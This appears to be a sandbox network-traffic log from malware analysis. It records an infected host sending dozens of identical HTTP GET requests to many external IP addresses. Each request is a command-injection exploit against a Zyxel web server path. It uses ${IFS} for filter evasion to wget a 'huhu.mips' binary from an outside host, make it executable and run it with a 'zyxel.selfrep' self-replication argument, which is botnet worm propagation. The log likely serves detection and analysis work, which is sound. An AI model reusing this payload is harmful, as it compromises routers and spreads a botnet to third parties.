                                                        Feb 2, 2024 06:21:13.993582964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5282192.168.2.1434204116.20.188.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993607998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5283192.168.2.1458016113.56.159.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993662119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5284192.168.2.143657288.159.72.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993712902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5285192.168.2.143735494.215.172.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993765116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5286192.168.2.145808872.211.178.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993817091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5287192.168.2.1433930181.109.67.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993843079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5288192.168.2.1437652131.157.10.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993904114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5289192.168.2.144122634.33.74.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993925095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5290192.168.2.144619070.238.181.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993947983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5291192.168.2.1448674209.213.2.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.993987083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5292192.168.2.1442488222.240.42.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994014978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5293192.168.2.145819641.124.168.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994070053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5294192.168.2.143774672.192.10.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994113922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5295192.168.2.145608682.0.156.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994152069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5296192.168.2.14497625.217.77.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994194031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5297192.168.2.1447614176.133.29.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994225025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5298192.168.2.144759252.31.158.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994278908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5299192.168.2.1441964217.172.63.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994309902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5300192.168.2.1460288159.169.140.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994352102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5301192.168.2.145986292.108.176.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994386911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5302192.168.2.1443004212.6.8.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994414091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5303192.168.2.143312418.106.165.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994452000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5304192.168.2.1440254199.165.222.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994503975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5305192.168.2.14414284.106.182.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994525909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5306192.168.2.1441626144.242.174.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994586945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5307192.168.2.145448681.226.119.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994623899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5308192.168.2.1460184219.197.133.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994652033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5309192.168.2.143857875.227.87.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994689941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5310192.168.2.1458952115.179.3.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994736910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5311192.168.2.1443230211.79.58.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994777918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5312192.168.2.145810250.87.101.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994822979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5313192.168.2.144732073.51.97.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994864941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5314192.168.2.1445016109.211.124.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994896889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5315192.168.2.145231061.19.10.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.994951010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5316192.168.2.1437436106.51.237.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995002985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5317192.168.2.1445914113.111.184.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995040894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5318192.168.2.144575492.93.105.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995074987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5319192.168.2.1436252176.57.24.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995106936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5320192.168.2.1446884204.249.193.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995152950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5321192.168.2.1454652109.85.11.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995182037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5322192.168.2.1442672166.125.142.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995208025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5323192.168.2.1460872171.172.109.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995264053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5324192.168.2.144783692.243.25.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995311975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5325192.168.2.144036846.236.219.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995343924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5326192.168.2.1437952173.5.157.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995389938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5327192.168.2.1457804219.203.123.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995426893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5328192.168.2.1437064106.68.228.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995465994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5329192.168.2.143504097.8.166.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995516062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5330192.168.2.145659840.167.112.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995539904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5331192.168.2.1455676113.46.10.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995578051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5332192.168.2.1449332138.72.241.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995628119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5333192.168.2.143571223.116.158.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995655060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5334192.168.2.1449394119.133.105.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995708942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5335192.168.2.144156812.57.87.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995770931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5336192.168.2.144489645.210.25.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995795965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5337192.168.2.1442046187.122.117.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995842934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5338192.168.2.143781495.188.169.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995887041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5339192.168.2.1441880122.255.90.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995919943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5340192.168.2.1451780116.230.177.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995953083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5341192.168.2.1450582185.110.17.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.995978117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5342192.168.2.1457946216.87.184.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996030092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5343192.168.2.1455592178.2.237.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996071100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5344192.168.2.1441142120.0.150.111443
                                                        TimestampBytes transferredDirectionData
